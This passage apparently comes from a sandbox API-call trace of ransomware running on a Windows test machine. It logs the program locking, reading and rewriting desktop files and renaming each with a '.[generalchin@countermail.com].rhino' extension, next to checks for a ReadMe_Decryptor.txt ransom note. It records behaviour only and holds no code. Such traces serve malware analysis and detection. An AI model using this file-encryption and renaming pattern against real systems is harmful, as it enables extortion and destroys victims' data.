halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\td8goi-0gaevfpr.mkv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0079.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0079.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0079.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0079.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0079.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0079.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0079.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0079.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0079.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\TxvVhQLw9w.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\txvvhqlw9w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.841] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x145d1 [0079.841] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x146f1, nNumberOfBytesToLockHigh=0x0) returned 1 [0079.841] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.842] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0079.843] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.844] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x145d1, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x145d1, lpOverlapped=0x0) returned 1 [0079.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0079.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0079.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0079.845] GetLastError () returned 0x0 [0079.845] SetLastError (dwErrCode=0x0) [0079.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0079.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x145f4) returned 0x744cd8 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.846] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0079.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0079.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0079.848] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0079.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0079.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0079.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0079.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7592d8 [0079.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0079.856] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75fdb8 [0079.856] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7592d8 | out: hHeap=0x6d0000) returned 1 [0079.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x769de8 [0079.858] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdb8 | out: hHeap=0x6d0000) returned 1 [0079.858] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x778e20 [0080.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769de8 | out: hHeap=0x6d0000) returned 1 [0080.118] WriteFile (in: hFile=0x124, lpBuffer=0x778e40*, nNumberOfBytesToWrite=0x146f1, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x778e40*, lpNumberOfBytesWritten=0x4af2ac*=0x146f1, lpOverlapped=0x0) returned 1 [0080.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x778e20 | out: hHeap=0x6d0000) returned 1 [0080.119] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x146f1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.119] CloseHandle (hObject=0x124) returned 1 [0080.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f36d0 [0080.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x703e78 [0080.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.133] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\TxvVhQLw9w.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\txvvhqlw9w.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\TxvVhQLw9w.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\txvvhqlw9w.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0080.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0080.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0080.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0080.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0080.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\ymOAZf.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\ymoazf.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.135] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x8c3d [0080.135] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8d5d, nNumberOfBytesToLockHigh=0x0) returned 1 [0080.135] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.135] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0080.137] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.137] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x8c3d, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x8c3d, lpOverlapped=0x0) returned 1 [0080.138] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0080.138] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.138] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0080.138] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0080.138] GetLastError () returned 0x0 [0080.138] SetLastError (dwErrCode=0x0) [0080.138] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8c60) returned 0x744cd8 [0080.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0080.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.139] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0080.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0080.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0080.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0080.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0080.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0080.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0080.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0080.142] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0080.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0080.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x74d940 [0080.150] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.150] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x754420 [0080.151] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74d940 | out: hHeap=0x6d0000) returned 1 [0080.151] WriteFile (in: hFile=0x124, lpBuffer=0x754440*, nNumberOfBytesToWrite=0x8d5d, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x754440*, lpNumberOfBytesWritten=0x4af2ac*=0x8d5d, lpOverlapped=0x0) returned 1 [0080.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754420 | out: hHeap=0x6d0000) returned 1 [0080.152] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8d5d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.152] CloseHandle (hObject=0x124) returned 1 [0080.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f36d0 [0080.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x703e78 [0080.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.391] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\ymOAZf.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\ymoazf.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\ymOAZf.ppt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\ymoazf.ppt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0080.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0080.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0080.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0080.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0080.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0080.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0080.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iE jK0f.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ie jk0f.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.392] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x163b9 [0080.392] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x164d9, nNumberOfBytesToLockHigh=0x0) returned 1 [0080.392] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.393] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, 